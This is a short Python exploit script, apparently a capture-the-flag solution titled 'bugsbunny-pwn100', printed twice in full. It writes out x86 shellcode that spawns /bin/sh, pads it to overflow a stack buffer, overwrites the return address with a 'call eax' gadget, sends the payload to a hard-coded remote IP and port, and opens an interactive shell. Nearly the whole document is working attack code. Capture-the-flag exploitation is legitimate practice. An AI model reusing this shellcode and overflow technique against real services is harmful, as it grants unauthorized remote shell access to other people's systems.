CreateRemoteThread/bugsbunny-pwn100.py

## bugsbunny-pwn100.py
#!/usr/bin/python

import sys
import pwn

# MAGIC BATH SALTS GO.

# 0x08048386: call eax;
# 0x08048386: call eax; leave; ret;

# first 3 instructions sub esp,28h to clean stack.
SC = "\x83\xEC\x28\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

# print len(SC)
# SC = "\x90\x90\xCC"
PADDING = "A" * (0x1c - len(SC))

# print SC+PADDING+"\x86\x83\x04\x08" + "\r"

p = pwn.remote("54.153.19.139",5252)
p.send(SC+PADDING+"\x86\x83\x04\x08" + "\r")
p.interactive()

# print SC + PADDING + "\x86\x83\x04\x08"
# print "BBBB"
	#!/usr/bin/python

	import sys
	import pwn

	# MAGIC BATH SALTS GO.

	# 0x08048386: call eax;
	# 0x08048386: call eax; leave; ret;

	# first 3 instructions sub esp,28h to clean stack.
	SC = "\x83\xEC\x28\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

	# print len(SC)
	# SC = "\x90\x90\xCC"
	PADDING = "A" * (0x1c - len(SC))

	# print SC+PADDING+"\x86\x83\x04\x08" + "\r"

	p = pwn.remote("54.153.19.139",5252)
	p.send(SC+PADDING+"\x86\x83\x04\x08" + "\r")
	p.interactive()

	# print SC + PADDING + "\x86\x83\x04\x08"
	# print "BBBB"